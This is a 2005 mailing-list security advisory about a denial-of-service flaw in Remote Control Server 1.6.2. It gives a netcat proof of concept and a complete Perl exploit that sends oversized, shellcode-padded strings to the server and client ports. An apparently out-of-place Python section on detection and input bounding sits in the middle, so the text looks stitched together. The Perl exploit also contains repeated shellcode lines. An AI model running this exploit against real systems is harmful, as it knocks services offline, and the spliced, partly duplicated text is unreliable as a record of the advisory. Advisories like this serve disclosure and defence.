
Thursday, July 21, 2005

[NT] Remote Control Server DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Remote Control Server DoS (Exploit)
------------------------------------------------------------------------

SUMMARY

<http://www.btcf.demon.co.uk/> Remote Control is "an application for
controlling large numbers of computers on a TCP/IP network while sitting
at the comfort of your own workstation. I have seen the same situation so
many times, especially with badly configured networks, or Windows 95
networks in general, there just doesn't seem to be a way to do certain
things without having to walk all the way over to the computer and do it
locally".

A denial of service condition occurs in the Remote Control Server whenever
a very long text string is sent to the service's data port.

DETAILS

Vulnerable Systems:
* Remote Control Server version 1.6.2

A simple denial of service condition occurs when a very long text string
is sent to the server's remote service port.

Proof of Concept:
E:\>nc -v localhost 1071
Infam0us-Gr0up [127.0.0.1] 1071 (?) open
[string]

You will receive one of the following error messages:
Run-time error '75':
Path/File access error
Or
Run-time error '380':
Invalid property value

Both of the following denial of service attacks cause the process to hang
at 100% CPU usage. When the string sent contains approximately 3094
characters, a reboot is required to terminate the hanging processes, and
the client reports:

Error 10061: Connection is forcefully rejected
No remote client to connect to.
Probable cause: Remote machine switched off or crashed.
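The fault described above is an unbounded read: the service accepts a command of any length and only fails (or hangs) once the oversized buffer reaches the VB runtime. The following Python is an added example, not code from the advisory or from the Remote Control product, showing the two things a defender wants here: a bounded command reader of the kind the service should have used, and a classifier that flags traffic to the advisory's port 1071 that is far larger than any legitimate command or carries a long run of 0x90 bytes. The length ceiling, the NOP-run threshold, the fake socket and the sample payloads are all constructed for the example.

```python
import re

# Port the advisory says the vulnerable service listens on.
SERVICE_PORT = 1071
# Assumed ceiling for a legitimate command. The advisory reports the hang
# at roughly 3094 bytes, so anything near that is far outside normal use.
MAX_COMMAND_LEN = 256
# A run of 0x90 (NOP) bytes at least this long is treated as suspicious.
NOP_RUN_THRESHOLD = 32

_NOP_RUN = re.compile(rb"\x90{%d,}" % NOP_RUN_THRESHOLD)


def classify_payload(dst_port: int, payload: bytes) -> str:
    """Label a captured TCP payload for the Remote Control service.

    Returns "ignore" for other ports, "oversize" when the payload exceeds
    MAX_COMMAND_LEN, "nop-sled" when it carries a long 0x90 run, else "ok".
    Length is checked first because it is the condition the advisory ties
    to the hang; the NOP check catches padded but shorter probes.
    """
    if dst_port != SERVICE_PORT:
        return "ignore"
    if len(payload) > MAX_COMMAND_LEN:
        return "oversize"
    if _NOP_RUN.search(payload):
        return "nop-sled"
    return "ok"


class FakeSocket:
    """Minimal stand-in for a connected socket (constructed for the example)."""

    def __init__(self, data: bytes):
        self._buf = data

    def recv(self, n: int) -> bytes:
        chunk, self._buf = self._buf[:n], self._buf[n:]
        return chunk


def read_command(sock, max_len: int = MAX_COMMAND_LEN) -> bytes:
    """Read one newline-terminated command with a hard length limit.

    This is the hardened form of an unbounded read: the loop never holds
    more than max_len bytes, and input that reaches the limit without a
    terminator is rejected before any parsing happens. Bytes received
    after the newline in the same chunk are discarded for simplicity.
    """
    buf = bytearray()
    while len(buf) < max_len:
        chunk = sock.recv(min(64, max_len - len(buf)))
        if not chunk:
            break
        buf += chunk
        nl = buf.find(b"\n")
        if nl != -1:
            return bytes(buf[:nl])
    if len(buf) >= max_len:
        raise ValueError("command exceeds %d bytes" % max_len)
    return bytes(buf)


# Constructed sample payloads: a normal command, the shape of the message
# the advisory's script sends (prefix, 0x90 padding, trailer), a short
# padded probe, and unrelated traffic on another port.
SAMPLES = [
    (1071, b"STATUS\n"),
    (1071, b"reboot" + b"\x90" * 3096 + b"|LOGOFF|"),
    (1071, b"x" * 40 + b"\x90" * 64 + b"\n"),
    (80, b"A" * 5000),
]

if __name__ == "__main__":
    for port, payload in SAMPLES:
        print(port, len(payload), classify_payload(port, payload))
    print(read_command(FakeSocket(b"STATUS\n")))
    try:
        read_command(FakeSocket(b"A" * 4000))
    except ValueError as exc:
        print("rejected:", exc)
```

The classifier is meant to be run over payloads pulled from a capture or an IDS content match on port 1071; the reader is the pattern to apply in the service itself, where rejecting the command at the limit avoids the 100% CPU hang the advisory reports.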

Exploit:
#!/usr/local/bin/perl
#
# Remote Control Server DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#

$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n";
print " Remote Control Server DOS Exploit\n";
print "------------------------------------\n\n";
print "Usage: $0 [remote IP]\n";
print "Exam: $0 127.0.0.1\n";
exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1071";
print "\n";
print "[+] Connect to $remote..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build server sploit..\n";
sleep(3);
$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec";
$sploit .= "\x8b\xc2\x83\xc0\x18\x33\xc9\x66\xb9\xb3\x80";
$sploit .= "\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa";
$sploit .= "\xaa\x59\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9";
$sploit .= "\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit .= "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa";
$sploit .= "\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit .= "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4";
$sploit .= "\xb7\xf0\xe0\xfd\x99";

print "[+] Attacking server..\n";
sleep(2);
$msg = "reboot" . $sploit . "\x90" x (3096 - length($sploit)) .
"\xe8\xf1\xc5\x05" . "|LOGOFF|";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
print "DONE\n";
print "[+] Server D0s'ed\n";
sleep(1);
close(SOCK);

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port1 = "1073";

print "[+] Connect to Client server..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port1, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK1, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build client Spl0it..\n";
sleep(3);

$dos =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";

print "[+] Attacking client..\n";
sleep(2);

print $dos;
send(SOCK1, $dos, 0) or die "Cannot send query: $!";

print "DONE\n";
print "[+] Client D0s'ed\n";
sleep(1);
close(SOCK1);
exit;

ADDITIONAL INFORMATION

The information has been provided by <mailto:basher13@linuxmail.org>
basher13.
The original article can be found at: <http://infamous.2hell.com/>

